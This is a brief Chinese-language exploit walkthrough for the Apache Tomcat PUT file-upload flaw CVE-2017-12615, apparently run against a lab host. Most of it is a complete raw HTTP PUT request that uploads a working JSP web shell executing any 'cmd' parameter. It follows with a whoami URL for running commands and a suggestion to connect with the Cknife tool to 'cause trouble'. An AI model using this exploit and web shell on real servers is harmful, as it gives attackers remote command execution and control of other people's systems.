CVE-2017-12615
首先tomcat需要开启写权限,支持我们把文件放到服务器上
我们先发一个jsp文件上去:
PUT /a.jsp/ HTTP/1.1
Host: 172.17.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=91DD89FBCC1307A04A8D6993DBF39919
Connection: close
Content-Length: 414
<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
我们就可以从浏览器愉快的输入命令了:
http://172.17.0.1:8080/a.jsp?cmd=whoami
我们也可以直接用Cknife然后直接连上搞事情